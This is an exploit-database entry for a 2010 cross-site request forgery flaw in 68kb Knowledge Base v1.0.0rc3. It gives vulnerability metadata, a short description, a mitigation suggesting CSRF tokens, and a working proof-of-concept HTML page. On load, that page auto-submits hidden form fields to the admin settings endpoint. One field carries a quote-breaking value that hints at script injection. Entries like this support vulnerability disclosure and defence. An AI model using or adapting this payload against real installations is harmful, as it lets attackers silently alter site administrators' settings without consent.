68kb Knowledge Base v1.0.0rc3 edit main settings CSRF

vendor:

Knowledge Base

by:

Jelmer de Hen

4,3

CVSS

MEDIUM

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: Knowledge Base

Affected Version From: v1.0.0rc3

Affected Version To: v1.0.0rc3

Patch Exists: NO

Related CWE: N/A

CPE: 68kb

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

68kb Knowledge Base v1.0.0rc3 edit main settings CSRF

This exploit allows an attacker to modify the main settings of the 68kb Knowledge Base v1.0.0rc3 application. The attacker can craft a malicious HTML page that contains a form with hidden fields that will be automatically submitted when the page is loaded. The form contains the parameters that can be modified, such as the site name, keywords, description, email, maximum search results, comments, and cache time. When the page is loaded, the form is automatically submitted and the settings are modified.

Mitigation:

The application should implement a CSRF protection mechanism, such as a CSRF token, to prevent unauthorized modification of the settings.

Source

Exploit-DB raw data:

Exploit Title: 68kb Knowledge Base v1.0.0rc3 edit main settings CSRF
Date: 2010-04-02
Author: Jelmer de Hen
Software Link: http://68kb.googlecode.com/files/68kb-v1.0.0rc3.zip
Version: v1.0.0rc3

<html>
<body onload="document.forms['edit_settings'].submit()">
<form name="edit_settings" action="http://server/index.php/admin/settings/main" method="post">
<input type=hidden name="site_name" value="Your Site">
<input type=hidden name="site_keywords" value='">escapable'>
<input type=hidden name="site_description" value="">
<input type=hidden name="site_email" value="a@a.com">
<input type=hidden name="max_search" value="5">
<input type=hidden name="comments" value="5">
<input type=hidden name="cache_time" value="0">
</form>
</body>
</html>